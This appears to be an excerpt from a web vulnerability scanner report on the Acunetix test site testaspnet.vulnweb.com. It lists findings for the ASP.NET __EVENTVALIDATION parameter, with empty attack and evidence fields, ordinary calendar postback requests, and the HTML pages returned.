Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8613&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAzT8iktsIZGRkimAo7yu98ZdXxTQ77XZzIp2Xj7w%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKR0Y%2FmCAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga4thSsztU5zOExwfRfb1C9K6Xt3w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:32 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAzT8iktsIZGRkimAo7yu98ZdXxTQ77XZzIp2Xj7w=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKR0Y/mCAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga4thSsztU5zOExwfRfb1C9K6Xt3w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:White" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8137&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAALGMXHNoIZGRkhf5xPrWP41bjIW90kwaD7Si6HmY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKRgIr3AwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDM8mcmbBkDRmte9AdoA7QyyAnrOw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:26 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAALGMXHNoIZGRkhf5xPrWP41bjIW90kwaD7Si6HmY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKRgIr3AwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDM8mcmbBkDRmte9AdoA7QyyAnrOw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:White" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
